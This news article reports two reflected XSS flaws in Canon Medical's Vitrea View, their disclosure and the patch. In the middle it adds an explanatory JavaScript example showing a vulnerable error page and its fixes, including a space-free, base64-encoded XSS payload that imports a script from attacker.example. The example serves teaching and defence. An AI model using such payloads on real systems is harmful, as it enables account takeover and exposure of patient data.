Researchers have recently reported a number of vulnerabilities in the software for the Canon Medical Vitrea View tool. Exploiting the flaws could expose patients' information and other related services to an attacker. Canon Medical patched the issues following the bug reports, urging users to upgrade their systems to receive the fixes.
Canon Medical Vitrea View Vulnerabilities
Reportedly, researchers from Trustwave SpiderLabs found two different vulnerabilities in the Canon Medical Vitrea View software.
As elaborated in their report, the flaws existed in the third-party software powering the Canon Medical tool that facilitates viewing medical images. Exploiting the flaws could allow an adversary to gain access to patients' data and other Vitrea View services.
Specifically, the first issue was a reflected cross-site scripting (XSS) vulnerability in the error message. The flaw appeared because the error page at /vitrea-view/error/ reflected all input after the /error/ subdirectory back to the user. While it had some minor restrictions on the reflected input, a savvy user could bypass them via backticks (`) and base64 encoding, and import remote code.
The second vulnerability was also identified as a reflected XSS; however, it existed in the Vitrea View administrative panel. Describing this vulnerability, the researchers stated,
“The search for ‘groupID’, ‘offset’, and ‘limit’ in the ‘Group and Users’ page of the administration panel all reflect their input back to the user when text is entered instead of the expected numerical inputs. Similar to the previous finding, the reflected input is slightly restricted, as it does not allow spaces.”
Exploiting the vulnerability required an attacker to trick the target user, via social engineering, into triggering the flaw while logged in to the admin panel. An adversary could easily do this by sending a maliciously crafted link to the victim user. When the victim clicked the link, the injected script would run in the victim's browser session, effectively giving the attacker admin control.
Upon exploiting the flaws, an attacker could view and access patients' details, including images and scans. The adversary could also access credentials for sensitive services and even modify the information according to the privileges gained.
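The two findings above share one root cause: user-controlled input (the path remainder after /error/, or the groupID/offset/limit parameters) is reflected into HTML without encoding, and the only "restriction" is a character blocklist. The following JavaScript is an added illustration, not Vitrea View's code or Trustwave's payload: it models a naive blocklist filter, a vulnerable error-page renderer, an HTML-escaping renderer, and a strict numeric-parameter check. The hostname attacker.example, the filter rules and the payload shape (a space-free tag using backticks and base64) are all constructed assumptions.

```javascript
// Added example (not Vitrea View's code): reflected XSS via an error page,
// why a "no spaces, no quotes" blocklist does not stop it, and the two fixes
// that do (output encoding and strict input validation).

// Hypothetical blocklist standing in for the "minor restrictions" the article
// mentions: rejects whitespace and single/double quotes, nothing else.
function naiveFilter(input) {
  return !/[\s"']/.test(input);
}

// Vulnerable: the path remainder after /error/ is interpolated verbatim into HTML.
function renderErrorPageVulnerable(pathRemainder) {
  return `<html><body><h1>Error</h1><p>Page not found: ${pathRemainder}</p></body></html>`;
}

// Output encoding: every character with meaning in an HTML text or attribute
// context is replaced by its entity, including the backtick.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return s.replace(/[&<>"'`]/g, c => map[c]);
}

// Hardened: same page, but the reflected value is escaped at the point of output.
function renderErrorPageSafe(pathRemainder) {
  return `<html><body><h1>Error</h1><p>Page not found: ${escapeHtml(pathRemainder)}</p></body></html>`;
}

// Strict validation for parameters that must be numeric (the admin panel's
// groupID, offset and limit): returns an integer or throws, and never echoes
// the raw input back in an error message.
function parseNumericParam(name, raw) {
  if (typeof raw !== 'string' || !/^\d{1,9}$/.test(raw)) {
    throw new Error(`invalid value for parameter ${name}`);
  }
  return Number(raw);
}

// Constructed payload: "/" separates tag name and attribute instead of a space,
// backticks replace quotes, and the remote script URL is base64-encoded so it
// contains no blocked characters. attacker.example is a reserved example host.
const REMOTE_SCRIPT = 'https://attacker.example/x.js';
const PAYLOAD = `<svg/onload=import(atob\`${Buffer.from(REMOTE_SCRIPT).toString('base64')}\`)>`;

// Runs the payload through the filter and both renderers and reports what happened.
function demo() {
  const encoded = PAYLOAD.match(/atob`([^`]+)`/)[1];
  return {
    passesFilter: naiveFilter(PAYLOAD),
    vulnerableReflectsTag: renderErrorPageVulnerable(PAYLOAD).includes('<svg/onload='),
    safeReflectsTag: renderErrorPageSafe(PAYLOAD).includes('<svg/onload='),
    decodedUrl: Buffer.from(encoded, 'base64').toString(),
  };
}

module.exports = { naiveFilter, renderErrorPageVulnerable, renderErrorPageSafe, escapeHtml, parseNumericParam, demo };
```

Running demo() shows the payload passing the blocklist and landing intact in the vulnerable page, while the escaping renderer neutralises it; parseNumericParam rejects text values outright instead of reflecting them. The practitioner's takeaway is that blocklists are bypassed by switching delimiters or encodings, whereas context-aware output encoding plus type validation removes the injection point entirely.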
Canon Medical Patched The Flaws
Following this discovery, Trustwave researchers responsibly disclosed the vulnerabilities to Canon Medical. In response, the vendor rolled out patched software version 7.7.6 for its devices.
Hence, the researchers now urge users to upgrade their systems to the latest software version to receive the patches.